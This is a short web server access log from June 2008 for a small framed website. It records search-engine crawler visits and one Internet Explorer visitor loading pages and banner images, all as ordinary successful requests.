74.6.22.151 - - [07/Jun/2008:04:23:08 +0200] "GET /DgH/bull/index.html HTTP/1.0" 200 1915 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.166 - - [07/Jun/2008:04:44:23 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.166 - - [07/Jun/2008:04:44:23 +0200] "GET /zampa/wonderland/index.html HTTP/1.1" 200 2084 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
24.161.80.99 - - [07/Jun/2008:04:57:39 +0200] "GET / HTTP/1.1" 200 10127 "http://www.randomwebsite.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
24.161.80.99 - - [07/Jun/2008:04:57:39 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
24.161.80.99 - - [07/Jun/2008:04:57:44 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
24.161.80.99 - - [07/Jun/2008:04:57:50 +0200] "GET /framez.html HTTP/1.1" 200 3883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
24.161.80.99 - - [07/Jun/2008:04:57:51 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
24.161.80.99 - - [07/Jun/2008:04:57:51 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 5834 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
24.161.80.99 - - [07/Jun/2008:04:57:51 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
24.161.80.99 - - [07/Jun/2008:04:57:51 +0200] "GET /bannerz/neon_click_3.gif HTTP/1.1" 200 240 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
24.161.80.99 - - [07/Jun/2008:04:57:52 +0200] "GET /eurosign3.gif HTTP/1.1" 200 7879 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
24.161.80.99 - - [07/Jun/2008:04:57:52 +0200] "GET /bannerz/neon_click_1.gif HTTP/1.1" 200 890 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
24.161.80.99 - - [07/Jun/2008:04:57:51 +0200] "GET /bannerz/goolag_468.jpg HTTP/1.1" 200 28285 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
24.161.80.99 - - [07/Jun/2008:04:57:52 +0200] "GET /bannerz/wet.gif HTTP/1.1" 200 18561 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
